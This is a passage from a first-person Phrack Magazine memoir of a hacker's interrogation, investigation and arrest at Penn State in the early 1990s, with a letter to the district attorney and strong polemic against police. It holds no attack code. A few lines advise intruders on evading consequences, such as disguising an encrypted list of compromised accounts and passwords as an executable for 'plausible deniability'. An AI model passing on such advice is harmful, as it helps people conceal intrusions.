My motives were pure and my conscience was clean.  With a sense
of self-righteousness unbecoming in a person my age, I assumed that
my integrity was invulnerability, and that my refusal to give them
any names was going to prevent them from fucking over my friends.

I had neglected to protect my email.  I had not encrypted my
communications.  I had not carefully deleted any incriminating
information from my disks, and because of this I am as guilty
as the people who blithely rat out their friends.  I damaged
the lives of a number of people by my carelessness, a number of
people who had more at stake than I had, and all my good intentions
were not worth a damn.  I had one encrypted file, that a list
of compromised systems and account names, and that was DES encrypted
with a six-character alphanumeric.

As I revelled in my self-righteousness, Dan Ehrlich and Robert Owens
arrived with a two-foot high pile of hardcopy on which was printed
every file on my PSUVM accounts, including at least a year of email
and all my posts to the net, including those in groups such as
alt.drugs, and articles by other people.

Wayne assumed that any item on the list, even saved posts from other
people, was something that had been sent to me personally by its
author, and that these people were, thus, involved in some vast conspiracy.
While keeping the printed email out of my sight, he began listing
names and asking me for information about that person.  I answered,
for every person, that I knew nothing about that person except what
they knew.  He asked such questions as "What is Emily Postnews'
real name, and how is she involved in the conspiracy?"

Ehrlich and Owens had conveniently disappeared, so I couldn't expect them to
explain the situation to Wayne; and had, myself, given up any attempt to
explain, realizing that anything I said would simply reinforce the cops'
paranoid conspiracy theories.  By then, I was refusing to answer practically
every question put to me, and finally realized I was outgunned.  When I had
arrived, I was puffed up with bravado and certain that I could talk my way out
of this awful situation.  Having made rather a hash of it as a hacker, I
resorted to my old standby, my tongue, with which I had been able
to escape any previous situation.  However, not only had I not talked
my way out of being busted, I had talked my way further into it.

If you believe, from years of experience at social engineering,
that you will be able to talk your way out of being busted, I wish
you luck; but don't expect it to happen.  If you talk with the police, and
you are not under arrest at the time, expect that one or two of
your sentences will be able to be taken out of context and used
as a justification for issuing an arrest warrant.  If you talk with
the police and you are under arrest, the Miranda statement:  "Anything
you say can and will be held against you in a court of law," is perhaps
the only true statement in that litany of lies.

In any case, my bravado had collapsed.  I still pointedly
called the cops "Wayne" and "Jeff," but otherwise, resorted to
repeating mechanically that I knew nothing about nothing.

Owens and Ehrlich returned, and announced that they had discovered
an encrypted file on my account, called holy.nodes.  I bitterly regretted
the flippant name, and the arrogance of keeping such a file.

If you must have an encrypted list of passwords and accounts
sitting around, at least give it a name that makes it seem like some
sort of executable, so that you have plausible deniability.

They assured me that they could decrypt it within six hours on a
Cray Y-MP to which they had access.  I knew that the Computer Science
Department had access to a Cray at the John von Neuman Computer Center.
I made a brief attempt to calculate the rate of brute-force password
cracking on a Cray and couldn't do it in my head.  However, as
the password was only six alphanumeric characters, I realized that it
was quite possible that it could be cracked.  I believe now that
I should have called their bluff, but I gave them the key, yet another
in a series of stupid moves.

Shortly, they had a list of computer sites, accounts and passwords,
and Wayne began grilling me on those.  Owens was livid when he noted
that a machine at Lawrence-Berkeley Labs, shasta.lbl.gov, was in the
list.  This was when my trouble started.

You might recall that Lawrence-Berkeley Labs figures prominently in
Clifford Stoll's book _The Cuckoo's Egg_.  The Chaos Computer
Club had cracked a site there in the mistaken belief that it was Lawrence-
Livermore.  As it happens, I had merely noticed a guest account there,
logged in and done nothing further.  Of course, this was too
simple an explanation for a cop to believe it.

Owens had given the police a tiny bit of evidence to support the
bizarre structure of conspiracy theories they had built; and a paranoid
delusion, once validated in even the most inconsequential manner, becomes
unshakably firm.

Wayne returned to the interrogation with renewed vigor.  I continued
giving answers to the effect that I knew nothing.  He came to the name of
Raymond Gary [*], who had generously allowed me to use an old account on
PSUVM, that of a friend of his who had left the area.  I attempted to assure
them of his innocence.  This was another bad move.

It was a bad move because this immediately reinforces the conspiracy
theory, and the cops wish to have more information on that
person.  I obfuscated, and returned to the habit of repeating:  "Not to
the best of my recollection," as if I were in the Watergate hearings.

Another name surfaced, that of a person who had allowed me to use his
account because our respective machines could not manage a tolerable
talk connection.  This person, without his knowledge, joined the
conspiracy.  Once again, I foolishly tried to explain the situation.
This simply made it worse, as the cop did not understand a word
I was saying; and Owens was incapable of appreciating the difference
between violating the letter of the law and the spirit of the law.

Wayne repeatedly asked about my overseas friends, informed me that he knew
there were foreign governments involved, again told me that a friend of mine
had informed on me.  I was told lies so outrageous that I hesitate to put them
on paper.  I denied everything.

I made another lengthy attempt at explanation, trying to defuse the conspiracy
theory, and gave a speech on the difference between breaking into someone's
house and ripping off everything there, voyeuristically spying on people, and
temporarily borrowing an account simply to talk to someone because a network
link was not working.  I made an analogy between this and asking
someone who is driving a corporate vehicle to give a jump to a
disabled vehicle, and tried to explain that this was certainly not
the same as if the authorized user of the corporate vehicle had simply
handed a passerby the keys.  I again attempted to explain the Internet, leased
lines, the difference between FTP and mail, why everyone on the Internet
allowed anyone else to transfer files from, to and through their machines, and
once again failed to explain anything.

Directly following this tirade, delivered almost at a shout, Wayne
leaned over the desk and asked me:  "Who's Bubba?"

This was too much to tolerate.  My ability to take the situation
seriously, already very shaky, simply vanished in the face of
this absurdity.  I lost it entirely.  I laughed hysterically.

I asked, my anger finally getting the better of my amusement:  "What the
fuck kind of question is that?"

He repeated the question, not appreciating the humor inherent in
this absurd contretemps; I was beyond trying to maintain the appearance
of solemnity.  Everything, the battered table, the primitive
tape recorder, the stony-faced cops, the overweight computer security
guys, seemed entirely empty of meaning.  I could no longer accept as real that
I was in this dim room with a person asking me the question:  "Who's Bubba?"

I said:  "I have no idea.  You tell me."

Finally, Wayne came to Dale's name.  Dale did not use his last name
in any of the email he had sent to me, and I hoped that his name
was not in any file on any machine anywhere.  I recovered some of
my equilibrium, and refused to answer.

A number of references to "lab supplies" were made in the email, and
I was questioned as to the meaning of this phrase.  I answered that
it simply meant quarter-inch reels of tape for music.  They refused
to accept this explanation, and accused me of running a drug ring over
the computer network.

Veiled threats, repetitions of the question, rephrasings of it,
assurances that they were going to get everyone anyway, and similar
cop routines followed.

Finally, having had altogether too much of this nonsense, I
said:  "This interview's over.  I'm leaving."  As simply as that,
and as quickly, I got up and left.  I wish I could say that I did
not look back, but I did glance over my shoulder as I left.

"We'll be in touch," said Wayne.

"Yeah, sure," I said.


VII.  Thirty Pieces of Silver

I informed Dale of the ominous turn in the investigation, and
told him that the cops were now looking for him.  From a sort of fatalistic
curiosity, we logged into Shamir's account to watch the activities
of the computer security guys, and to confer with some of their
associates to find out what their motivations might be.  We had
decided that the possibility of a wiretap was slim, and that if
there were a wiretap, we were doomed anyway, so what the hell?

There is no conclusive evidence that there was a wiretap, but
the police would not have needed a warrant to tap university
phones, as they are on a private branch exchange, which does
not qualify for legal protection.  In addition, one bit of
circumstantial evidence strikes me as indicative of the possibility
of a wiretap, that being that when Dale called Shamir to explain
the situation, and left a message in his voice mail box, the
message directly following Dale's was from Wayne.

We frequented the library, researching every book dealing with the subject of
computer crime, reading the Pennsylvania State Criminal Code, photocopying and
transcribing important texts, and compiling a disk of information relevant to
the case, including any information that someone "on the outside" would need
to know if we were jailed.

I badly sprained my ankle in this period, but walked on it for three
miles, and it was not until later in the night that I even realized
there was anything wrong with it, so preoccupied was I by the bizarre
situation in which I was embroiled.  In addition, an ice storm developed,
leaving a thin layer of ice over sidewalks, roads and the skeletal
trees and bushes.  I must have seemed a ridiculous figure hobbling
across the ice on a cane, looking over my shoulder every few seconds;
and attempting to appear casual whenever a police car passed.

It seemed that wherever I went, there was a police car which slowed
to my pace, and it always seemed that people were watching me.  I
tried to convince myself that this was paranoia, that not everyone
could be following me, but the feeling continued to intensify, and
I realized that I had adopted the mentality of the cops,
that we were, essentially, part of the same societal process; symbiotic
and necessary to each other's existence.  The term 'paranoia' had no
meaning when applied to this situation; as there were, indeed, people
out to get me; people who were equally convinced that I was out to
get them.

I resolved to accept the situation, and abide by its unspoken rules.
As vast as the texts are which support the law, there is another
entity, The Law, which is infinite and can not be explained in
any number of words, codes or legislation.

Dale and I painstakingly weighed our options.

Finally, Dale decided that he was going to contact the police, and
called a friend of his in the police department to ask for assistance
in doing so, Stan Marks [*], who was also an electronic musician.
On occasion, Stan would visit us in the Lab, turning off his walkie-
talkie to avoid the irritation of the numerous trivial assignments
which comprise the day-to-day life of the university cop.
After conferring with Stan, he decided simply to call Wayne and
Jeff on the phone to arrange an interview.

I felt like shit.  The repercussions of my actions were spreading
like ripples on a pond, and were to disrupt the lives of several of
my dearest friends.  At the same time, I was enraged.  How
dare they do this?  What had I done that warranted this torturous
and ridiculous investigation?  Wasn't this investigation enough of
a punishment just in and of itself?

I wondered how many more innocent people would have to be fucked
over before the police would be satisfied, and wondered how many
innocent people, every day, are similarly fucked over in other
investigations.  How many would it take to satisfy the cops?
The answer is, simply, every living person.

If you believe that your past, however lily-white, would withstand
the scrutiny of an investigation of several months' duration, with
every document and communication subjected to minute investigation,
you are deluding yourself.  To the law-enforcement mentality, there
are no innocent people.  There are only undiscovered criminals.

Only if we are all jailed, cops and criminals alike, will the machinery lie
dormant, to rust its way to gentle oblivion; and only then will the ruins be
left undisturbed for the puzzlement of future archaeologists.

With these thoughts, I waited as Dale went to the police station,
with the realization that I was a traitor by inaction, by having
allowed this to happen.

I was guilty, but this guilt was not a matter of law.  My innocent
actions were those which were to be tried.

If you are ever busted, you will witness this curious inversion of
morality, as if by entering the world of cops you have walked
through a one-way mirror, in which your good actions are suddenly
and arbitrarily punished, and the evil you have done is rewarded.


VIII.  Third and Fourth Interrogations

I waited anxiously for Dale to return from his meeting.  He had
brought with him a professional tape recorder, in order to tape
the interview.  The cops were rather upset by this turn
of events, but had no choice but to allow him to tape.  While they
attempted to get their tape recorder to work, he offered to loan
them a pair of batteries, as theirs were dead.

The interrogation followed roughly the same twists and turns as
mine had, with more of an emphasis on the subject of "lab supplies."
Question followed question, and Dale insisted that his actions were innocent.

"Hell, if we'd have had a couple of nice women, none of this
would even have happened," he said.

When asked about the Huang account that Ron Gere had created for
him, he explained that Huang was a nom-de-plume, and certainly not
an alias for disguising crime.

The police persisted, and returned to the subject of "lab supplies",
and finally declared that they knew Dale and I were dealing in some
sort of contraband, but that they would be prepared to offer leniency
if he would give them names.  Dale was adamant in his refusal.

Finally, they said that they wanted him to make a drug buy for
them.

"Well, you'll have to introduce me to someone, because I sure
don't know anyone who does that kind of stuff."

Eventually, they set an appointment with him to speak with Ron
Schreffler, the university cop in charge of undercover narcotics
investigations.

He called to reschedule the appointment a few days later, and then,
eventually, cancelled it entirely, saying:  "I have nothing to talk
to him about."

Finally, they ceased following this tack, realizing that even in
Pennsylvania pursuing an entirely fruitless avenue of investigation
is seen very dimly by their superiors.  The topic of "lab supplies"
was never mentioned again, and certainly not in the arrest warrant
affidavit, as we were obviously innocent of any wrongdoing in that
area.

Warning Dale not to leave the area, they terminated the interview.

Shortly thereafter, there was a fourth and final interview, with
Dale and I present.  We discussed nothing of any significance, and
it was almost informal, as if we and the cops were cronies of some sort.
Only Jeffery Jones was excluded from this circle, as he was limited
largely to monosyllabic grunts and wild, paranoid accusations.  We
discovered that Wayne Weaver was a twenty-three year veteran, and
it struck me that if I had met him in other circumstances I could
have found him quite likable.  He was, if nothing else, a professional,
and acted in a professional manner even when he was beyond his
depth in the sea of information which Dale and I navigated with
ease.

I felt almost sympathetic toward him, and wondered how it was for
him to be involved in a case so complex and bizarre.  I still failed
to realize why he was acting toward us as he was, and realized that
he, similarly, had no idea what to make of us, who must have seemed
to him like remorseless, arrogant criminals.  Unlike my prejudiced
views of what a police officer should be, Wayne was a competent,
intelligent man doing the best he could in a situation beyond his
range of experience, and tried to behave in a conscientious manner.

I feel that Wayne was a good man, but that the very system
he upheld gave him no choice but to do evil, without realizing it.
I am frustrated still by the fact that no matter how much we could
discuss the situation, we could never understand each other in
fullness, because our world-views were so fundamentally different.
Unlike so many of the incompetent losers and petty sadists who
find police work a convenient alternative to criminality, Wayne
was that rarity, a good cop.

Still, without an understanding of the computer subculture, he could not but
see anything we might say to explain it to him as anything other than alien
and criminal, just as a prejudiced American finds a description of the customs
of some South Sea tribe shocking and bizarre.  Until we realize what
underlying assumptions we share with the rest of society, we shall be
divided, subculture from culture, criminals from police.

The ultimate goal of the computer underground is to create the circumstances
which will underlie its own dissolution, to enable the total and free
dissemination of all information, and thus to destroy itself by becoming
mainstream.  When everyone thinks nothing of doing in daylight what we are
forced to do under cover of darkness, then we shall have succeeded.

Until then, we can expect the Operation Sun-Devils to continue,
and the witch-hunts to extend to every corner of cyberspace.  The
public at large still holds an ignorant dread of computers, having
experienced oppression by those who use computers as a tool of
secrecy and intrusion, having been told that they are being audited
by the IRS because of "some discrepancies in the computer," that
their paycheck has been delayed because "the computer's down,"
that they can't receive their deceased spouse's life-insurance benefits
because "there's nothing about it in the computer."  The computer
has become both omnipresent and omnipotent in the eyes of many,
is blamed by incompetent people for their own failure, is used
to justify appalling rip-offs by banks and other major social
institutions, and in addition is not understood at all by the
majority of the population, especially those over thirty, those
who comprise both the law-enforcement mentality and aging hippies,
both deeply distrustful of anything new.

It is thus that such a paradox would exist as a hacker, and if
we are to be successful, we must be very careful to understand
the difference between secrecy and privacy.  We must understand
the difference between freedom of information and freedom from
intrusion.  We must understand the difference between invading
the inner sanctum of oppression and voyeurism, and realize that
even in our finest hours we too are fallible, and that in
negotiating these finely-hued gray areas, we are liable to
lose our path and take a fall.

In this struggle, we can not allow a justifiable anger to become
hatred.  We can not allow skepticism to become nihilism.  We can
not allow ourselves to harm innocents.  In adopting the
intrusive tactics of the oppressors, we must not allow ourselves
to perform the same actions that we detest in others.

Perhaps most importantly, we must use computers as tools to serve
humanity, and not allow humans to serve computers.  For the
non-living to serve the purposes of the living is a good and
necessary thing, but for the living to serve the purposes of
the non-living is an abomination.



 

--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 13 of 27

                              [My Bust Continued]


IX.  Consultations

Dale and I began to consider options in our battle against this senseless
investigation.  We spent many nights pondering the issue, and arrived at a
number of conclusions.

Since we had already talked to the police, and were rapidly realizing
what a vast error that had been, we wondered how it was possible
to sidestep, avoid or derail the investigation.  We hoped that Ron
Gere and others would not be held accountable for my actions, a wish
that was to be denied.

A great deal of resentment existed toward me in those whose
lives were affected, and I would be either an idiot or a liar to deny
that my actions affected many people, in many places, some of whom I
had never even met in person.  However, I was unable to do anything
for many of these people, so I concentrated largely on my own survival
and that of those near me.

Dale and I decided, eventually, that the only person who could claim
any real damage was Dhamir Mannai, and we arranged an
appointment with him to discuss what had happened.

We met in his book-lined office in the Electrical Engineering Office,
and shook hands before beginning a discussion.  I explained what
I had done, and why I had done it, and apologized for any damages that
had occurred.  Dale, similarly, excused my actions, and while he had
nothing to do with them, noted that he was under investigation as well.

We offered to help repair the /etc/groups file which I had damaged,
but due to the circumstances, it is understandable that he politely
declined our offer.

Dhamir was surprisingly sympathetic, though justifiably angered.  However,
after about a half hour of discussion, he warmed from suspicion to
friendliness, and after two hours of discussion he offered to testify
for us against the police, noting that he had been forced on two previous
occasions to testify against police.  He held a very dim
view of the investigation, and noted that "The police have bungled the case
very badly."  Dhamir, in fact, was so annoyed by the investigation that he
called Wayne that night to object to it.  He made it clear that he
intended to oppose the police.

The next night, as Dale and I were entering the Music Building, a police
cruiser came to a sudden stop in the parking lot and Wayne walked up to
us with a perturbed expression.

Without pausing for greetings, he informed us that he was now
considering filing additional charges against us for "Tampering with
Witnesses," without identifying the witness.  In his eyes, the legality
of restraining our actions and speech based on hypothetical and unfiled
charges was not relevant; and he was angry that a primary witness had
been rendered useless to him.

Finally, we talked more informally.  Genuinely curious about his
motivations, we asked him about the investigation and what turns
could be expected in the future.  Realizing that the investigation
had entered a quiescent stage and we would not likely meet again
until court, we talked with him.

Dale said "So let me get this straight.  They saddled the older,
more experienced cop with the recruit?"

Wayne didn't answer, but nodded glumly.

"What's this like for you?" I asked.

"Well, I have to admit, in my twenty-three years on the force,
this case is the biggest hassle I've ever had."

"I can see why," said Dale.

"I almost wish you had been in charge of this case, instead of that
goof Jeff," I said.

"Yes, he's too jumpy," said Dale.  "Like an Irish Setter with a gun."

"Well, if I'd been in charge of this case," Wayne said, "it would have
been down the pike a long time ago."

After more discussion of this sort, Wayne's walkie-talkie burst into
cop chatter.

"We have three men, throwing another man, into a dumpster, behind
Willard," the voice said.

"I guess this means you have to leave, Wayne," said Dale.

Wayne looked embarrassed.  We exchanged farewells.

Another very helpful person was Professor Richard Devon,
of the Science, Technology and Science department of Penn State.  We
read an article he wrote on the computer underground which, while
hardly condoning malicious hacking, certainly objected to the prevailing
witch-hunt mentality.  We contacted him to discuss the case.

He offered to provide testimony in our behalf, and informed us
of the prevailing attitudes of computer security professionals at
Penn State and elsewhere.  He corroborated our belief that the
vendetta against us was largely due to the fact that we had embarrassed
Penn State, and that the intensity of the investigation was also largely
due to fallout from the Morris Worm incident.

The fact that he was on the board of directors for the Engineering Computer
Lab increased the value of his testimony.  We were expecting damaging
testimony from Bryan Jensen of ECL.

He was friendly and personable, and we talked for several hours.

While there was nothing he could do until the time came to give testimony,
it was very gratifying to find two friends and allies in what we had
thought was a hostile camp.

Our feeling of isolation and paranoia began to dwindle, and we began to
feel more confident about the possible outcome of the investigation.


X.  Going Upstairs

With a new-found confidence, we decided to see if it were possible to
end this investigation entirely before charges were filed and it
became a criminal prosecution.

Dale called the Director of Police Services with the slim hope that
he had no knowledge of this investigation and might intervene to stop
it.  No dice.

Dale and I composed a letter to the district attorney objecting to
the investigation, also in the hopes of avoiding the prosecution of
the case.  I include the letter:


    Dear Mr. Gricar:

    We are writing to you because of our concerns regarding an investigation
    being conducted by the Pennsylvania State University Department of
    University Safety with respect to violations of Pa.C.S.A. tilde 3933
    (Unlawful Use of Computer) alleged to us.  We have enclosed a copy of
    this statute for your convenience.

    Despite recommendations from NASA security officials and concerned members
    of the professional and academic computing community that we file suit
    against the Pennsylvania State Universities, we have tried earnestly to
    accommodate this investigation.

    We have cooperated fully with Police Services Officers Wayne Weaver
    and Jeffrey Jones at every opportunity in this unnecessary eight-week
    investigation.   However, rather than arranging for direct communication
    between the complaining parties and us to make it possible to make clear
    the nature of our activities, the University Police have chosen to siphon
    information to these parties in an easily-misinterpreted and secondhand
    manner.  This has served only to obscure the truth of the matter and create
    confusion, misunderstanding and inconvenience to all involved.

    The keen disappointment of the University Police in finding that we have
    not been involved in espionage, electronic funds transfer or computer
    terrorism appears to have finally manifested itself in an effort to
    indict us for practices customary and routine among faculty and students
    alike. While we have come to realize that activities such as using a
    personal account with the permission of the authorized user may constitute
    a violation of an obscure and little-known University policy, we find it
    irregular and unusual that such activities might even be considered a
    criminal offense.

    The minimal and inferential evidence which either will
    or has already been brought before you is part of a preposterous attempt to
    shoehorn our alleged actions into the jurisdiction of a law which lacks
    relevance to a situation of this nature.

    We have found this whole affair to be capricious and arbitrary, and despite
    our reasonable requests to demonstrate and display our activities in the
    presence of computer-literate parties and with an actual computer, they
    have, for whatever reasons, denied direct lines of communication which
    could have enabled an expeditious resolution to this problem.

    This investigation has proceeded in a slipshod manner, rife with inordinate
    delays and intimidation well beyond that justified by an honest desire to
    discern the truth.  While certain evidence may appear to warrant scrutiny,
    this evidence is easily clarified; and should the District Attorney's
    office desire, we would be pleased to provide a full and complete
    accounting of all our activities at your convenience and under oath.

    In view of the judicial system being already overtaxed by an excess of
    important and pressing criminal cases, we would like to apologize for
    this matter even having encroached on your time.

                                      Sincerely yours,



                                      Dale Garrison
                                      Robert W. F. Clark


This letter had about as much effect as might be imagined, that is to
say, none whatever.

My advice from this experience is that it is very likely that you will
be able to find advice in what you might think to be a hostile quarter.
To talk to the complaining party and apologize for any damage you might
have caused is an excellent idea, and has a possibility of getting the
charges reduced or perhaps dropped entirely.

Simply because the police list a person as a complaining party does not
necessarily mean that the person necessarily approves of, or even has
knowledge of, the police proceedings.  In all likelihood, the complaining
parties have never met you, and have no knowledge of what your
motivations were in doing what you did.  With no knowledge of your motives,
they are likely to attribute your actions to malice.

If there are no demonstrable damages, and the person is sympathetic, you
may find an ally in the enemy camp.  Even if you have damaged a machine,
you are in a unique position to help repair it, and prevent further
intrusion into their system.

Regardless of the end result, it can't hurt to get some idea of what
the complaining parties think.  If you soften outright hostility and
outrage even to a grudging tolerance, you have improved the chance
of a positive outcome.

While the police may object to this in very strong terms, and make dire
and ambiguous threats, without a restraining order of some kind there
is very little they can do unless you have bribed or otherwise
offered a consideration for testimony.

Talking to the police, on the other hand, is a very bad idea, and
will result in disaster.  Regardless of any threats and intimidation they
use, there is absolutely nothing they can do to you if you do not
talk to them.  Any deal they offer you is bogus, a flat-out lie.  They
do not have the authority to offer you a deal.  These two facts can not
be stressed enough.  This may seem common knowledge, the sort even an
idiot would know.  I knew it myself.

However, from inexperience and arrogance I thought myself immune
to the rules.  I assumed that talking to them could damage nothing,
since I had done nothing wrong but make a mistake.  Certainly
this was just a misunderstanding, and I could easily clear it up.

The police will encourage you to believe this, and before you realize it
you will have told them everything they want to know.

Simply, if you are not under arrest, walk away.  If you are
under arrest, request an attorney.

Realize that I, a confirmed paranoid, knowing and having heard this
warning from other people, still fell into the trap of believing myself
able to talk my way out of prosecution.  Don't do the same thing
yourself, either from fear or arrogance.

Don't tell them anything.  They'll find out more than enough without
your help.


XI.  Interlude

Finally, after what had seemed nearly two weeks of furious activity,
constant harassment and disasters, the investigation entered a more
or less quiescent state.  It was to remain in this state for several
months.

This is not to say that the harassment ceased, or that matters improved.
The investigation seemed to exist in a state of suspended animation, from
our viewpoint.  Matters ceased getting worse exponentially.
Now, they merely got worse arithmetically.

My parents ejected me from home for the second time due to my
grades.  They did not know about the police investigation.  I
was in no hurry to tell them about it.  I could have went to live
with my father, but instead I returned to State College by bus, with no
money, no prospects and no place to live.  I blamed the police
investigation for my grades, which was not entirely correct.  I
doubt, however, that I would have failed as spectacularly as I had
if the police had not entered my life.

Over the Christmas break, when the campus was mostly vacant, Dale
noticed a new set of booted footprints in the new-fallen snow every
night, by the window to the Electronic Music Lab, and by that window
only.

A few times, I heard static and odd clicks on the telephone at
the Lab, but whether this was poor telephone service or some
clumsy attempt at a wiretap I can not say with assurance.

I discovered that my food card was still valid, so
I had a source of free food for a while.  I had switched to a
nocturnal sleep cycle, so I slept during the day in the Student Union
Building, rose for a shower in the Athletics Building at about midnight,
and hung out in the Electronic Music Lab at night.  Being homeless is not as
difficult as might be imagined, especially in a university environment,
as long as one does not look homeless.  Even if one does look scruffy,
this will raise few eyebrows on a campus.

Around this time, I switched my main interest from computer hacking to
reading and writing poetry, being perhaps the thousandth neophyte poet
to use Baudelaire as a model.  I suppose that I was striving to create
perfection from imperfect materials, also my motivation for hacking.

Eventually, Dale offered to let me split the rent with him on a room.
The police had 'suggested' that WPSX-TV3 fire him from his job as an
audio technician.  Regardless of the legality of this skullduggery,
WPSX-TV3, a public television station, reprehensibly fired him.
This is another aspect of the law-enforcement mentality which bears
close examination.

While claiming a high moral ground, as protectors of the community,
they will rationalize a vendetta as somehow protecting some vague and
undefined 'public good.'  With the zeal of vigilantes, they
will eschew the notion of due process for their convenience.  Considering
the law beneath them, and impatient at the rare refusal of judges and
juries to be a rubber-stamp for police privilege, they will take
punishment into their own hands, and use any means necessary to destroy
the lives of those who get in their way.

According to the Random House Dictionary of the English Language
(Unabridged Edition):

    Police state:  a nation in which the police, especially a
    secret police, suppresses any act by an individual or group
    that conflicts with governmental policy or principle.

Since undisclosed members of CERT, an organization directly
funded by Air Force Intelligence, are authorized to make anonymous
accusations of malfeasance without disclosing their identity, they
can be called nothing but secret police.

The spooks at the CIA and NSA also hold this unusual privilege, even if
one does not consider their 'special' operations.  What can these
organizations be called if not secret police?

It can not be denied, even by those myopic enough to believe that such
organizations are necessary, that these organizations comprise a vast
and secret government which is not elected and not subject to legal
restraint.  Only in the most egregious cases of wrongdoing are these
organizations even censured; and even in these cases, it is only the
flunkies that receive even a token punishment; the principals, almost
without exception, are exonerated and even honored.  Those few
who are too disgraced to continue work even as politicians ascend to
the rank of elder statesmen, and write their memoirs free from
molestation.

When your job, your property and your reputation can be destroyed
or stolen without recompense and with impunity, what can our
nation be called but a police state?  When the police are even free
to beat you senseless without provocation, on videotape, and still
elude justice, what can this nation be called but a police state?

Such were my thoughts during the months when the investigation
seemed dormant, as my anger began, gradually, to overcome
my fear.  This is the time that I considered trashing
the Penn State data network, the Internet, anything I could.
Punishment, to me, has always seemed merely a goad to future
vengeance.  However, I saw the uselessness of taking revenge on
innocent parties for the police's actions.

I contacted the ACLU, who showed a remarkable lack of interest in
the case.  As charges had not been filed, there was little they
could do.  They told me, however, to contact them in the event
that a trial date was set.

"If you cannot afford an attorney, one will be provided for you."
This is, perhaps, the biggest lie in the litany of lies
known as the Miranda rights.  It is the court which prosecutes
you that decides whether you can afford an attorney, and the same
court selects that attorney.

Without the formal filing of charges, you can not receive the assistance
of a public defender.  This is what I was told by the public defender's
office.  Merely being investigated apparently does not entail the right
to counsel, regardless of the level of harassment involved in the
investigation.

We remained in intermittent contact with the police, and called
every week or so to ask what was happening.  We learned nothing new.
The only information of any importance I did learn was at a
party.  Between hand-rolled cigarettes of a sort never sold by
the R. J. Reynolds' Tobacco Company, I discussed my case.

This might not be the sort of thing one would normally do at a party,
but if you are busted you will find that the investigation takes a
central role in your life.  When you are not talking about it, you
are thinking about it.  When you are not thinking about it, you are
trying the best you can not to think about it.  It is a cherished belief
of mine that anyone who survives a police investigation ought to receive
at least an Associate's degree in Criminal Law; you will learn more about
the law than you ever wished to know.

The person on my right, when I said that Jeffery Jones was in charge
of the case, immediately started.  "He was in my high school class,"
said the man, who sported a handlebar mustache.

"What?  Really?  What's he like?  Is he as much of an asshole in person?"
I asked.

"He was kind of a weird kid."

"How?  What's he done?  Have you kept in touch?"

"Well, all I really know about him is that he went out to be a cop in
Austin, but he couldn't take it, had a breakdown or something, and came
back here."

"I can see that.  He's a fucking psycho."

I gloated over this tidbit of information, and decided that I would
use it the next time I met the police.

This was to be several weeks.  Though we had given the police our work
schedules, phone numbers at home, work and play; and informed them when
they might be likely to locate us at any particular place, we had apparently
underestimated the nearly limitless incompetence of Penn State's elite
computer cops.

As he was walking to work one day, Dale saw Jeffery Jones driving
very slowly and craning his neck in all directions, apparently looking
for someone.  However, he failed to note the presence of Dale, the only
person on the street.  Dale wondered whether Jeffery had been looking for
him.

The next night at the Lab, the telephone rang.  With a series of typical,
frenzied accusations Jeffery Jones initiated the conversation.  He believed
that we had been attempting to escape or evade him in some manner.  Wayne
was on another line, and Dale and I talked from different phones.

"You've been trying to avoid us, haven't you?" Jeffery shouted.

"Where have you been?" asked Wayne.

"We told you where we'd be.  You said you'd be in touch,"  I said.

"We haven't been able to find you," said Wayne.

"Look, you have our goddamn work schedule, our address, our phone
numbers, and where we usually are.  What the hell else do you need?"
asked Dale.

"We went to your address.  The guy we talked to didn't know where
you were,"  said Wayne.

As we discovered later that night, the police had been at our apartment,
and had knocked on the wrong door, that of our downstairs neighbor,
a mental patient who had been kicked out of the hospital after Reagan's
generous revision of the mental health code.  His main activity was
shouting and threatening to kill people who weren't there, so the
consternation of the police was not surprising.

"So we weren't there.  You could have called," said Dale.

"I just hope you don't decide to leave the area.  We're going to
arrest you in a couple of days," said Wayne.

"You've been saying that for the last three months," I said.
"What's taking so long?"

"The secretary's sick," said Jeffery.

"You ought to get this secretary to a doctor.  She must be
really goddamn sick, if she can't type up an arrest warrant
in three months," said Dale.

"Hell, I'll come down and type up the damn thing myself, if
it's too tough for the people you have down there," I offered.

"No, that won't be necessary," said Wayne.

"Look, when you want to arrest us, just give us a call and we'll
come down.  Don't pull some dumb cop routine like kicking in the
door," said Dale.

"Okay," Wayne said.  "Your cooperation will be noted."

"By the way, Jeff, I heard you couldn't hack it in Austin," I said.

Silence followed.

After an awkward silence, Wayne said:  "We'll be in touch."

We said our goodbyes, except for Jeffery, and hung up the phones.

I somewhat regretted the last remark, but was still happy with its
reception.  It is probably unwise to play Scare-the-Cops, but by
then I no longer gave a damn.  He was probably dead certain that I
had found this information, and other tidbits of information I had
casually mentioned, in some sort of computer database.  His mind
was too limited to consider the possibility that I had met an old
high-school chum of his and pumped him for information.

By this time, our fear of the police had diminished, and both of
us were sick to death of the whole business.  We just hoped that
whatever was to happen would happen more quickly.

When the police first started threatening to arrest us within days,
it would send a tremor down my spine.  However, after three months of
obfuscation, excuses, continued harassment of this nature, my only
response to this threat was anger and boredom.

At least, upon arrest, we would enter a domain where there were some
rules of conduct and some certainty.  The Kafkaesque uncertainty and
arbitrarily redefined rules inherent in a police investigation were
intolerable.

After another month of delay, the police called us again,
and we agreed to come in to be arrested at nine o'clock the
next morning.

It was possible that the police would jail us, but it seemed unlikely.
Two prominent faculty members had strongly condemned the behavior of
the police.  The case was also politically-charged, and jailing us
would likely have resulted in howls of outrage, and perhaps even in
a civil or criminal suit against Penn State.

Wayne told us that we would have to go to the District Magistrate
for a preliminary hearing.  Dale said that we would go, but demanded a ride
there and back.  The police complied.

We were more relieved than worried.  Finally, something was happening.


XII.  The Arrest

On a cold and sunny morning we walked into the police station to be
arrested.  I was curious as to the fingerprinting procedure.  The cops
were to make three copies of my fingerprints, one for the local police,
one for the state police, and one for the FBI.

Jeffery was unable to fingerprint me on the first two attempts.
When he finally succeeded in fingerprinting me, he had to do it again.
He had incorrectly filled out the form.  Finally, with help
from Wayne, he was able to fingerprint me.

Dale was more difficult.  Jeffery objected to the softness of Dale's
fingers, and said that would make it difficult.  The fact that Dale's
fingers were soft, as he is a pianist more accustomed to smooth
ivory than plastic, would seem to exonerate him from any charge of
computer hacking.  However, such a thought never troubled the idyllic
vacancy of Jeffery's mind.  He was too busy bungling through
the process of fingerprinting.  Wayne had to help him again.

There was soap and water for washing the ink from our
fingers.  However, it left the faintest trace of ink on the pads
of my fingers, and I looked at the marks with awe, realizing that
I had been, in a way, permanently stigmatized.

However, as poorly as the soap had cleaned my fingers, I thought
with grim amusement that Jeffery would have much more difficulty
cleaning the ink from his clothes.

